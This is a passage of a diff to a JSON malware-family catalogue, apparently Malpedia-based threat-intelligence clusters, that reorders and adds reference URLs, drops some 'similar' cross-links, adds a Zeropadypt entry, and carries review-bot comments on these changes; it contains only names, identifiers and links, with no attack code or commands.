+ "https://www.bleepingcomputer.com/news/security/free-decryptor-released-for-yanluowang-ransomware-victims/"
+ ],
+ "synonyms": [
+ "Dryxiphia"
],
- "synonyms": [],
"type": []
},
"uuid": "4bc19ce2-e169-4f9f-aabf-ec7fc6a75d12",
@@ -48883,8 +51515,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.yorekey",
- "https://www.proofpoint.com/sites/default/files/threat-reports/pfpt-us-tr-threat-insight-paper-triple-threat-N-Korea-aligned-TA406-steals-scams-spies.pdf",
- "https://www.proofpoint.com/us/blog/threat-insight/triple-threat-north-korea-aligned-ta406-scams-spies-and-steals"
+ "https://www.proofpoint.com/us/blog/threat-insight/triple-threat-north-korea-aligned-ta406-scams-spies-and-steals",
+ "https://www.proofpoint.com/sites/default/files/threat-reports/pfpt-us-tr-threat-insight-paper-triple-threat-N-Korea-aligned-TA406-steals-scams-spies.pdf"
],
"synonyms": [],
"type": []
@@ -48929,8 +51561,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.ytstealer",
- "https://blog.sekoia.io/privateloader-the-loader-of-the-prevalent-ruzki-ppi-service/",
- "https://www.intezer.com/blog/research/ytstealer-malware-youtube-cookies/"
+ "https://www.intezer.com/blog/research/ytstealer-malware-youtube-cookies/",
+ "https://blog.sekoia.io/privateloader-the-loader-of-the-prevalent-ruzki-ppi-service/"
],
"synonyms": [],
"type": []
@@ -48943,11 +51575,11 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.yty",
+ "https://threatrecon.nshc.net/2019/08/02/sectore02-updates-yty-framework-in-new-targeted-campaign-against-pakistan-government/",
+ "https://www.amnesty.org/en/wp-content/uploads/2021/10/AFR5747562021ENGLISH.pdf",
"https://ti.360.net/blog/articles/latest-activity-of-apt-c-35/",
"http://blog.ptsecurity.com/2019/11/studying-donot-team.html",
"https://www.welivesecurity.com/2022/01/18/donot-go-do-not-respawn/",
- "https://threatrecon.nshc.net/2019/08/02/sectore02-updates-yty-framework-in-new-targeted-campaign-against-pakistan-government/",
- "https://www.amnesty.org/en/wp-content/uploads/2021/10/AFR5747562021ENGLISH.pdf",
"https://www.secureworks.com/research/threat-profiles/zinc-emerson",
"https://www.arbornetworks.com/blog/asert/donot-team-leverages-new-modular-malware-framework-south-asia/"
],
@@ -49005,52 +51637,45 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.zebrocy",
- "https://securelist.com/zebrocys-multilanguage-malware-salad/90680/",
- "https://www.intezer.com/blog/research/russian-apt-uses-covid-19-lures-to-deliver-zebrocy/",
- "https://unit42.paloaltonetworks.com/atoms/fighting-ursa/",
- "https://researchcenter.paloaltonetworks.com/2018/06/unit42-sofacy-groups-parallel-attacks/",
- "https://www.intezer.com/wp-content/uploads/2021/02/Intezer-2020-Go-Malware-Round-Up.pdf",
- "https://brandefense.io/zebrocy-malware-technical-analysis-report/",
- "https://github.com/microsoft/Microsoft-365-Defender-Hunting-Queries",
- "https://www.vkremez.com/2018/12/lets-learn-reviewing-sofacys-zebrocy-c.html",
- "https://mp.weixin.qq.com/s/6R7bFs9lH1I3BNdkatCC9g",
+ "https://unit42.paloaltonetworks.com/sandbox-evasion-memory-detection/",
+ "https://cocomelonc.github.io/persistence/2022/12/09/malware-pers-20.html",
+ "https://unit42.paloaltonetworks.com/sofacy-creates-new-go-variant-of-zebrocy-tool/",
"https://symantec-blogs.broadcom.com/blogs/election-security/apt28-espionage-military-government",
- "https://us-cert.cisa.gov/ncas/analysis-reports/ar20-303b",
- "https://www.welivesecurity.com/2018/04/24/sednit-update-analysis-zebrocy/",
- "https://www.welivesecurity.com/2018/11/20/sednit-whats-going-zebrocy/",
- "https://meltx0r.github.io/tech/2019/10/24/apt28.html",
- "https://www.welivesecurity.com/2019/09/24/no-summer-vacations-zebrocy/",
- "https://www.secureworks.com/research/threat-profiles/iron-twilight",
- "https://mp.weixin.qq.com/s/pE_6VRDk-2aTI996sff0og",
- "https://www.welivesecurity.com/2019/05/22/journey-zebrocy-land/",
- "https://www.vkremez.com/2018/12/lets-learn-dissecting-apt28sofacy.html",
- "https://securelist.com/greyenergys-overlap-with-zebrocy/89506/",
- "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf",
- "https://www.bleepingcomputer.com/news/security/russian-hackers-use-fake-nato-training-docs-to-breach-govt-networks/",
- "https://quointelligence.eu/2020/09/apt28-zebrocy-malware-campaign-nato-theme/",
- "https://www.macnica.net/file/mpressioncss_ta_report_2019.pdf",
- "https://www.accenture.com/us-en/blogs/blogs-snakemackerel-delivers-zekapab-malware",
"https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-old-dogs-new-tricks.pdf",
- "https://ics-cert.kaspersky.com/media/Kaspersky-ICS-CERT-APT-attacks-on-industrial-organizations-in-H1-2021-En.pdf",
- "https://securelist.com/a-zebrocy-go-downloader/89419/",
+ "https://us-cert.cisa.gov/ncas/analysis-reports/ar20-303b",
+ "https://www.intezer.com/blog/research/russian-apt-uses-covid-19-lures-to-deliver-zebrocy/",
"https://research.checkpoint.com/malware-against-the-c-monoculture/",
+ "https://github.com/microsoft/Microsoft-365-Defender-Hunting-Queries",
+ "https://mp.weixin.qq.com/s/pE_6VRDk-2aTI996sff0og",
+ "https://www.welivesecurity.com/2018/04/24/sednit-update-analysis-zebrocy/",
+ "https://securelist.com/zebrocys-multilanguage-malware-salad/90680/",
+ "https://www.vkremez.com/2018/12/lets-learn-dissecting-apt28sofacy.html",
+ "https://researchcenter.paloaltonetworks.com/2018/06/unit42-sofacy-groups-parallel-attacks/",
+ "https://meltx0r.github.io/tech/2019/10/24/apt28.html",
+ "https://www.welivesecurity.com/2018/11/20/sednit-whats-going-zebrocy/",
+ "https://www.secureworks.com/research/threat-profiles/iron-twilight",
+ "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf",
+ "https://www.accenture.com/us-en/blogs/blogs-snakemackerel-delivers-zekapab-malware",
+ "https://ics-cert.kaspersky.com/media/Kaspersky-ICS-CERT-APT-attacks-on-industrial-organizations-in-H1-2021-En.pdf",
+ "https://securelist.com/greyenergys-overlap-with-zebrocy/89506/",
+ "https://quointelligence.eu/2020/09/apt28-zebrocy-malware-campaign-nato-theme/",
"https://securelist.com/apt-trends-report-q2-2019/91897/",
- "https://unit42.paloaltonetworks.com/sofacy-creates-new-go-variant-of-zebrocy-tool/"
+ "https://www.vkremez.com/2018/12/lets-learn-reviewing-sofacys-zebrocy-c.html",
+ "https://www.bleepingcomputer.com/news/security/russian-hackers-use-fake-nato-training-docs-to-breach-govt-networks/",
+ "https://www.welivesecurity.com/2019/05/22/journey-zebrocy-land/",
+ "https://www.welivesecurity.com/2019/09/24/no-summer-vacations-zebrocy/",
+ "https://securelist.com/a-zebrocy-go-downloader/89419/",
+ "https://mp.weixin.qq.com/s/6R7bFs9lH1I3BNdkatCC9g",
+ "https://www.macnica.net/file/mpressioncss_ta_report_2019.pdf",
+ "https://brandefense.io/zebrocy-malware-technical-analysis-report/",
+ "https://unit42.paloaltonetworks.com/atoms/fighting-ursa/",
+ "https://www.intezer.com/wp-content/uploads/2021/02/Intezer-2020-Go-Malware-Round-Up.pdf"
],
"synonyms": [
"Zekapab"
],
"type": []
},
- "related": [
- {
- "dest-uuid": "8a2ae47a-c7b2-11e8-b223-ab4d8f78f3ef",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "973124e2-0d84-4be5-9c8e-3ff16bb43b42",
"value": "Zebrocy"
},
@@ -49111,17 +51736,21 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.zeppelin",
- "https://threatvector.cylance.com/en_us/home/zeppelin-russian-ransomware-targets-high-profile-users-in-the-us-and-europe.html",
- "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/paas-or-how-hackers-evade-antivirus-software/",
- "https://www.cisa.gov/uscert/ncas/alerts/aa22-223a",
- "https://www.gdatasoftware.com/blog/2020/06/35946-burans-transformation-into-zeppelin",
- "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/wp-spark-state-of-ransomware.pdf",
- "https://medium.com/walmartglobaltech/man1-moskal-hancitor-and-a-side-of-ransomware-d77b4d991618",
"https://www.paloaltonetworks.com/content/dam/pan/en_US/assets/pdf/reports/Unit_42/unit42-ransomware-threat-report-2021.pdf",
+ "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/paas-or-how-hackers-evade-antivirus-software/",
+ "https://blog.sekoia.io/vice-society-a-discreet-but-steady-double-extortion-ransomware-group/",
+ "https://community.riskiq.com/article/47766fbd",
+ "https://threatvector.cylance.com/en_us/home/zeppelin-russian-ransomware-targets-high-profile-users-in-the-us-and-europe.html",
"https://storage.pardot.com/272312/124918/Flashpoint_Hunt_Team___Zeppelin_Ransomware_Analysis.pdf",
+ "https://www.symantec.broadcom.com/hubfs/SED/SED_Threat_Hunter_Reports_Alerts/SED_FY22Q2_SES_Ransomware-Threat-Landscape_WP.pdf",
+ "https://www.intrinsec.com/vice-society-spreads-its-own-ransomware/",
"https://www.cisa.gov/uscert/sites/default/files/publications/AA22-223A_Zeppelin_CSA.pdf",
"https://www.cisa.gov/uscert/ncas/alerts/aa22-249a",
- "https://www.symantec.broadcom.com/hubfs/SED/SED_Threat_Hunter_Reports_Alerts/SED_FY22Q2_SES_Ransomware-Threat-Landscape_WP.pdf"
+ "https://www.gdatasoftware.com/blog/2020/06/35946-burans-transformation-into-zeppelin",
+ "https://www.cisa.gov/uscert/ncas/alerts/aa22-223a",
+ "https://www.microsoft.com/en-us/security/blog/2022/10/25/dev-0832-vice-society-opportunistic-ransomware-campaigns-impacting-us-education-sector/",
+ "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/wp-spark-state-of-ransomware.pdf",
+ "https://medium.com/walmartglobaltech/man1-moskal-hancitor-and-a-side-of-ransomware-d77b4d991618"
],
"synonyms": [],
"type": []
@@ -49134,15 +51763,15 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.zeroaccess",
+ "https://blog.malwarebytes.com/threat-analysis/2013/08/sophos-discovers-zeroaccess-using-rlo/",
+ "http://resources.infosecinstitute.com/step-by-step-tutorial-on-reverse-engineering-malware-the-zeroaccessmaxsmiscer-crimeware-rootkit/",
"http://contagiodump.blogspot.com/2012/12/zeroaccess-sirefef-rootkit-5-fresh.html",
+ "http://resources.infosecinstitute.com/zeroaccess-malware-part-3-the-device-driver-process-injection-rootkit/",
"https://www.researchgate.net/profile/Lorenzo-De-Carli/publication/320250366_Botnet_protocol_inference_in_the_presence_of_encrypted_traffic/links/5fa9608792851cc286a08592/Botnet-protocol-inference-in-the-presence-of-encrypted-traffic.pdf?origin=publication_detail",
"http://resources.infosecinstitute.com/zeroaccess-malware-part-4-tracing-the-crimeware-origins-by-reversing-injected-code/",
- "http://resources.infosecinstitute.com/zeroaccess-malware-part-3-the-device-driver-process-injection-rootkit/",
- "https://blog.malwarebytes.com/threat-analysis/2013/08/sophos-discovers-zeroaccess-using-rlo/",
- "http://resources.infosecinstitute.com/zeroaccess-malware-part-2-the-kernel-mode-device-driver-stealth-rootkit/",
- "http://resources.infosecinstitute.com/step-by-step-tutorial-on-reverse-engineering-malware-the-zeroaccessmaxsmiscer-crimeware-rootkit/",
- "http://contagiodump.blogspot.com/2010/11/zeroaccess-max-smiscer-crimeware.html",
"https://blog.malwarebytes.com/threat-analysis/2013/07/zeroaccess-anti-debug-uses-debugger/",
+ "http://contagiodump.blogspot.com/2010/11/zeroaccess-max-smiscer-crimeware.html",
+ "http://resources.infosecinstitute.com/zeroaccess-malware-part-2-the-kernel-mode-device-driver-stealth-rootkit/",
"https://www.virusbulletin.com/virusbulletin/2016/01/paper-notes-click-fraud-american-story/"
],
"synonyms": [
@@ -49160,25 +51789,17 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.zerocleare",
- "https://www.microsoft.com/security/blog/2022/09/08/microsoft-investigates-iranian-attacks-against-the-albanian-government",
"https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf",
- "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf",
+ "https://www.microsoft.com/security/blog/2022/09/08/microsoft-investigates-iranian-attacks-against-the-albanian-government",
+ "https://www.ibm.com/downloads/cas/OAJ4VZNJ",
+ "https://www.crowdstrike.com/blog/the-anatomy-of-wiper-malware-part-3/",
"https://www.crowdstrike.com/blog/the-anatomy-of-wiper-malware-part-1/",
"https://www.fortinet.com/blog/threat-research/the-increasing-wiper-malware-threat",
- "https://www.ibm.com/downloads/cas/OAJ4VZNJ"
+ "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf"
],
"synonyms": [],
"type": []
},
- "related": [
- {
- "dest-uuid": "40fdcaac-a733-4088-9058-7b15a415b943",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "a7e1429f-55bd-41ac-bf45-70c93465d113",
"value": "ZeroCleare"
},
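Review bot: Dropping the whole "related" array here silently removes the "similar" cross-reference from ZeroCleare to dest-uuid 40fdcaac-a733-4088-9058-7b15a415b943; the same removal is repeated for ZeroT (ff00fa92-b32e-46b6-88ca-98357ebe3f54), Zeus (0ce448de-c2bb-4c6e-9ad7-c4030f02b4d7) and ZXShell (5b9dc67e-bae4-44f3-b58d-6d842a744104). If these relations are now produced by a separate step or were retired on purpose, the commit message should say so; otherwise they should be kept, since consumers that pivot between clusters on "related" lose those links with no replacement.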
@@ -49208,6 +51829,21 @@
"uuid": "b226e6bb-b8bf-4c5d-b0b3-c7c04d12679a",
"value": "ZeroLocker"
},
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.zeropadypt",
+ "https://www.pcrisk.com/removal-guides/16844-harma-ouroboros-ransomware"
+ ],
+ "synonyms": [
+ "Ouroboros"
+ ],
+ "type": []
+ },
+ "uuid": "b8f99ed3-5669-4c71-b217-e92659a6e6bd",
+ "value": "Zeropadypt"
+ },
{
"description": "",
"meta": {
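Review bot: The new Zeropadypt entry ships with "description": "" and "type": [], so the only human-readable content is the synonym Ouroboros and the two refs. Existing entries such as ZeroT follow the same empty-description pattern, so this is consistent with the file, but if the generator has nothing to put there it would be cleaner to omit the key than to emit an empty string; a one-line summary from the Malpedia page would be better still.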
@@ -49218,15 +51854,6 @@
"synonyms": [],
"type": []
},
- "related": [
- {
- "dest-uuid": "ff00fa92-b32e-46b6-88ca-98357ebe3f54",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "9b0aa458-dfa9-48af-87ea-c36d1501376c",
"value": "ZeroT"
},
@@ -49235,59 +51862,52 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.zeus",
- "https://securelist.com/financial-cyberthreats-in-2020/101638/",
- "https://www.kryptoslogic.com/blog/2021/07/trickbot-and-zeus/",
- "http://eternal-todo.com/blog/detecting-zeus",
- "https://www.symantec.com/connect/blogs/spyeye-s-kill-zeus-bark-worse-its-bite",
- "http://malwareint.blogspot.com/2010/02/zeus-on-irs-scam-remains-actively.html",
"https://www.youtube.com/watch?v=LUxOcpIRxmg",
- "https://www.secureworks.com/research/threat-profiles/bronze-woodland",
- "http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/zeus_king_of_bots.pdf",
- "https://www.mnin.org/write/ZeusMalware.pdf",
- "https://www.secureworks.com/research/zeus?threat=zeus",
- "https://blog.malwarebytes.com/101/2021/07/the-life-and-death-of-the-zeus-trojan/",
- "https://krebsonsecurity.com/2019/12/inside-evil-corp-a-100m-cybercrime-menace/",
- "https://us-cert.cisa.gov/ncas/alerts/aa20-345a",
- "http://eternal-todo.com/blog/new-zeus-binary",
- "https://blog.talosintelligence.com/2022/02/threat-roundup-0204-0211.html",
- "http://malwareint.blogspot.com/2010/02/facebook-phishing-campaign-proposed-by.html",
- "https://blog.trendmicro.com/trendlabs-security-intelligence/kivars-with-venom-targeted-attacks-upgrade-with-64-bit-support/",
- "https://go.recordedfuture.com/hubfs/reports/cta-2021-0909.pdf",
- "http://contagiodump.blogspot.com/2010/07/zeus-trojan-research-links.html",
- "https://www.wired.com/2017/03/russian-hacker-spy-botnet/",
- "http://malwareint.blogspot.com/2009/07/special-zeus-botnet-for-dummies.html",
- "http://malwareint.blogspot.com/2010/03/new-phishing-campaign-against-facebook.html",
- "https://www.secureworks.com/research/threat-profiles/gold-evergreen",
"http://contagiodump.blogspot.com/2010/07/zeus-version-scheme-by-trojan-author.html",
- "https://www.f5.com/labs/articles/education/banking-trojans-a-reference-guide-to-the-malware-family-tree",
- "https://nakedsecurity.sophos.com/2010/07/24/sample-run/",
+ "https://www.secureworks.com/research/threat-profiles/bronze-woodland",
+ "https://www.cisecurity.org/insights/blog/top-10-malware-march-2022",
"https://www.justice.gov/opa/pr/four-individuals-plead-guilty-rico-conspiracy-involving-bulletproof-hosting-cybercriminals",
- "http://contagiodump.blogspot.com/2012/12/dec-2012-linuxchapro-trojan-apache.html",
- "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-008.pdf",
- "https://www.symantec.com/connect/blogs/brief-look-zeuszbot-20",
- "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf",
- "https://www.secureworks.com/research/evolution-of-the-gold-evergreen-threat-group",
+ "http://eternal-todo.com/blog/detecting-zeus",
"https://www.s21sec.com/en/zeus-the-missing-link/",
+ "https://www.wired.com/2017/03/russian-hacker-spy-botnet/",
+ "https://www.secureworks.com/research/zeus?threat=zeus",
+ "https://go.recordedfuture.com/hubfs/reports/cta-2021-0909.pdf",
+ "https://www.kryptoslogic.com/blog/2021/07/trickbot-and-zeus/",
+ "http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/zeus_king_of_bots.pdf",
"http://malwareint.blogspot.com/2010/01/leveraging-zeus-to-send-spam-through.html",
+ "http://malwareint.blogspot.com/2010/02/zeus-on-irs-scam-remains-actively.html",
+ "https://www.mnin.org/write/ZeusMalware.pdf",
+ "http://contagiodump.blogspot.com/2010/07/zeus-trojan-research-links.html",
+ "https://unit42.paloaltonetworks.com/banking-trojan-techniques/",
+ "http://malwareint.blogspot.com/2010/03/new-phishing-campaign-against-facebook.html",
+ "http://contagiodump.blogspot.com/2012/12/dec-2012-linuxchapro-trojan-apache.html",
+ "https://www.f5.com/labs/articles/education/banking-trojans-a-reference-guide-to-the-malware-family-tree",
+ "https://blog.talosintelligence.com/2022/02/threat-roundup-0204-0211.html",
+ "https://blog.trendmicro.com/trendlabs-security-intelligence/kivars-with-venom-targeted-attacks-upgrade-with-64-bit-support/",
+ "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-008.pdf",
+ "http://malwareint.blogspot.com/2009/07/special-zeus-botnet-for-dummies.html",
+ "https://nakedsecurity.sophos.com/2010/07/24/sample-run/",
+ "https://www.symantec.com/connect/blogs/spyeye-s-kill-zeus-bark-worse-its-bite",
+ "https://blog.malwarebytes.com/101/2021/07/the-life-and-death-of-the-zeus-trojan/",
+ "http://malwareint.blogspot.com/2010/02/facebook-phishing-campaign-proposed-by.html",
"http://eternal-todo.com/blog/zeus-spreading-facebook",
- "https://web.archive.org/web/20160616170611/https://media.blackhat.com/bh-eu-10/presentations/Carrera_Silberman/BlackHat-EU-2010-Carrera-Silberman-State-of-Malware-slides.pdf",
"http://www.secureworks.com/research/threat-profiles/gold-evergreen",
- "https://www.anomali.com/files/white-papers/russian-federation-country-profile.pdf"
+ "https://us-cert.cisa.gov/ncas/alerts/aa20-345a",
+ "https://web.archive.org/web/20160616170611/https://media.blackhat.com/bh-eu-10/presentations/Carrera_Silberman/BlackHat-EU-2010-Carrera-Silberman-State-of-Malware-slides.pdf",
+ "http://eternal-todo.com/blog/new-zeus-binary",
+ "https://www.symantec.com/connect/blogs/brief-look-zeuszbot-20",
+ "https://www.secureworks.com/research/threat-profiles/gold-evergreen",
+ "https://krebsonsecurity.com/2019/12/inside-evil-corp-a-100m-cybercrime-menace/",
+ "https://www.secureworks.com/research/evolution-of-the-gold-evergreen-threat-group",
+ "https://securelist.com/financial-cyberthreats-in-2020/101638/",
+ "https://www.anomali.com/files/white-papers/russian-federation-country-profile.pdf",
+ "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf"
],
"synonyms": [
"Zbot"
],
"type": []
},
- "related": [
- {
- "dest-uuid": "0ce448de-c2bb-4c6e-9ad7-c4030f02b4d7",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "4e8c1ab7-2841-4823-a5d1-39284fb0969a",
"value": "Zeus"
},
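Review bot: After this hunk the Zeus refs contain both "http://www.secureworks.com/research/threat-profiles/gold-evergreen" (kept context) and "https://www.secureworks.com/research/threat-profiles/gold-evergreen" (re-added), which differ only in the scheme; suggest de-duplicating on a normalised URL in the generator so the same source is not listed twice. The genuine additions in this hunk are the cisecurity.org top-10 malware post and the unit42 banking-trojan-techniques article; everything else is reordering.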
@@ -49296,8 +51916,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.zeus_action",
- "https://www.youtube.com/watch?v=EyDiIAt__dI",
- "https://twitter.com/benkow_/status/1136983062699487232"
+ "https://twitter.com/benkow_/status/1136983062699487232",
+ "https://www.youtube.com/watch?v=EyDiIAt__dI"
],
"synonyms": [],
"type": []
@@ -49339,9 +51959,9 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.zeus_sphinx",
- "https://securityaffairs.co/wordpress/39592/cyber-crime/sphinx-variant-zeus-trojan.html",
"https://web.archive.org/web/20160130165709/http://darkmatters.norsecorp.com/2015/08/24/sphinx-new-zeus-variant-for-sale-on-the-black-market/",
- "https://securityintelligence.com/posts/zeus-sphinx-back-in-business-some-core-modifications-arise/"
+ "https://securityintelligence.com/posts/zeus-sphinx-back-in-business-some-core-modifications-arise/",
+ "https://securityaffairs.co/wordpress/39592/cyber-crime/sphinx-variant-zeus-trojan.html"
],
"synonyms": [],
"type": []
@@ -49407,7 +52027,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.zingo_stealer",
- "https://blogs.blackberry.com/en/2022/05/threat-thursday-zingostealer"
+ "https://blogs.blackberry.com/en/2022/05/threat-thursday-zingostealer",
+ "https://blog.talosintelligence.com/haskers-gang-zingostealer/"
],
"synonyms": [
"Ginzo"
@@ -49451,86 +52072,88 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.zloader",
- "https://www.forcepoint.com/blog/security-labs/zeus-delivered-deloader-defraud-customers-canadian-banks",
- "https://www.microsoft.com/security/blog/2022/04/13/dismantling-zloader-how-malicious-ads-led-to-disabled-security-tools-and-ransomware/",
- "https://insight-jp.nttsecurity.com/post/102gsqj/pseudogatespelevo-exploit-kit",
- "https://blog.alyac.co.kr/3322",
- "https://www.bleepingcomputer.com/news/security/fake-microsoft-teams-updates-lead-to-cobalt-strike-deployment/",
- "https://medium.com/walmartglobaltech/signed-dll-campaigns-as-a-service-7760ac676489",
- "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware",
- "https://unit42.paloaltonetworks.com/api-hammering-malware-families/",
- "https://www.lastline.com/labsblog/evolution-of-excel-4-0-macro-weaponization/",
- "https://labs.sentinelone.com/enter-the-maze-demystifying-an-affiliate-involved-in-maze-snow/",
- "https://resources.malwarebytes.com/files/2020/05/The-Silent-Night-Zloader-Zbot_Final.pdf",
- "https://www.cybereason.com/blog/threat-analysis-report-socgholish-and-zloader-from-fake-updates-and-installers-to-owning-your-systems",
- "https://info.phishlabs.com/blog/zloader-dominates-email-payloads-in-q1",
- "https://research.checkpoint.com/2022/can-you-trust-a-files-digital-signature-new-zloader-campaign-exploits-microsofts-signature-verification-putting-users-at-risk/",
- "https://blog.talosintelligence.com/2020/12/2020-year-in-malware.html",
- "https://www.bleepingcomputer.com/news/security/banking-malware-spreading-via-covid-19-relief-payment-phishing/",
- "https://www.sophos.com/en-us/medialibrary/pdfs/technical-papers/sophos-2021-threat-report.pdf",
- "https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/",
- "https://www.deepinstinct.com/2021/05/26/deep-dive-packing-software-cryptone/",
- "https://aaqeel01.wordpress.com/2021/10/18/zloader-reversing/",
- "https://cybleinc.com/2021/04/19/zloader-returns-through-spelevo-exploit-kit-phishing-campaign/",
- "https://mal-eats.net/en/2021/05/11/campo_new_attack_campaign_targeting_japan/",
- "https://www.youtube.com/watch?v=mhX-UoaYnOM",
- "https://www.crowdstrike.com/blog/duck-hunting-with-falcon-complete-qakbot-zip-based-campaign/",
- "https://www.youtube.com/watch?v=QBoj6GB79wM",
- "https://twitter.com/VK_Intel/status/1294320579311435776",
- "https://www.proofpoint.com/us/blog/threat-insight/zloader-loads-again-new-zloader-variant-returns",
"https://blag.nullteilerfrei.de/2020/06/11/api-hashing-in-the-zloader-malware/",
- "https://blog.vincss.net/2022/04/re026-a-deep-dive-into-zloader-the-silent-night.html",
- "https://documents.trendmicro.com/assets/txt/IOCs-zloader-campaigns-at-a-glance.txt",
- "https://securityintelligence.com/posts/zeus-sphinx-trojan-awakens-amidst-coronavirus-spam-frenzy/",
- "https://0xc0decafe.com/2020/12/23/detect-rc4-in-malicious-binaries",
- "https://blogs.microsoft.com/on-the-issues/2022/04/13/zloader-botnet-disrupted-malware-ukraine/",
- "https://info.phishlabs.com/blog/surge-in-zloader-attacks-observed",
+ "https://mal-eats.net/en/2021/05/11/campo_new_attack_campaign_targeting_japan/",
"https://malware.pizza/2020/06/19/further-evasion-in-the-forgotten-corners-of-ms-xls/",
- "https://noticeofpleadings.com/zloader/",
- "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf",
- "https://umbrella.cisco.com/blog/cybersecurity-threat-spotlight-strrat-zloader-honeygain",
- "https://mal-eats.net/2021/05/10/campo_new_attack_campaign_targeting_japan/",
- "https://blog.talosintelligence.com/2020/09/salfram-robbing-place-without-removing.html",
- "https://threatresearch.ext.hp.com/wp-content/uploads/2021/03/HP_Bromium_Threat_Insights_Report_Q4_2020.pdf",
- "https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf",
- "https://www.comae.com/posts/2020-03-13_yet-another-active-email-campaign-with-malicious-excel-files-identified/",
- "https://team-cymru.com/blog/2021/11/03/webinject-panel-administration-a-vantage-point-into-multiple-threat-actor-campaigns/",
- "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/paas-or-how-hackers-evade-antivirus-software/",
- "https://blog.malwarebytes.com/cybercrime/2017/01/zbot-with-legitimate-applications-on-board/",
- "https://medium.com/csis-techblog/inside-view-of-brazzzersff-infrastructure-89b9188fd145",
- "https://securityintelligence.com/around-the-world-with-zeus-sphinx-from-canada-to-australia-and-back/",
- "https://securityliterate.com/chantays-resume-investigating-a-cv-themed-zloader-malware-campaign/",
- "https://blog.morphisec.com/obfuscated-vbscript-drops-zloader-ursnif-qakbot-dridex",
- "https://www.crowdstrike.com/blog/falcon-overwatch-uncovers-ongoing-night-spider-zloader-campaign/",
+ "https://www.bleepingcomputer.com/news/security/fake-microsoft-teams-updates-lead-to-cobalt-strike-deployment/",
+ "https://info.phishlabs.com/blog/surge-in-zloader-attacks-observed",
+ "https://www.cisa.gov/uscert/ncas/alerts/aa22-110a",
+ "https://www.crowdstrike.com/blog/duck-hunting-with-falcon-complete-qakbot-zip-based-campaign/",
+ "https://blag.nullteilerfrei.de/2020/05/24/zloader-string-obfuscation/",
+ "https://blogs.microsoft.com/on-the-issues/2022/04/13/zloader-botnet-disrupted-malware-ukraine/",
+ "https://insight-jp.nttsecurity.com/post/102gsqj/pseudogatespelevo-exploit-kit",
"https://news.sophos.com/en-us/2020/10/28/hacks-for-sale-inside-the-buer-loader-malware-as-a-service/",
- "https://johannesbader.ch/blog/the-dga-of-zloader/",
- "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf",
+ "https://www.forcepoint.com/blog/security-labs/zeus-delivered-deloader-defraud-customers-canadian-banks",
+ "https://blog.malwarebytes.com/cybercrime/2017/01/zbot-with-legitimate-applications-on-board/",
+ "https://www.comae.com/posts/2020-03-13_yet-another-active-email-campaign-with-malicious-excel-files-identified/",
+ "https://www.sentinelone.com/labs/hide-and-seek-new-zloader-infection-chain-comes-with-improved-stealth-and-evasion-mechanisms/",
+ "https://www.guidepointsecurity.com/from-zloader-to-darkside-a-ransomware-story/",
+ "https://noticeofpleadings.com/zloader/",
+ "https://labs.k7computing.com/?p=22458",
+ "https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/",
+ "https://mal-eats.net/2021/05/10/campo_new_attack_campaign_targeting_japan/",
+ "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf",
+ "https://blogs.quickheal.com/zloader-entailing-different-office-files/",
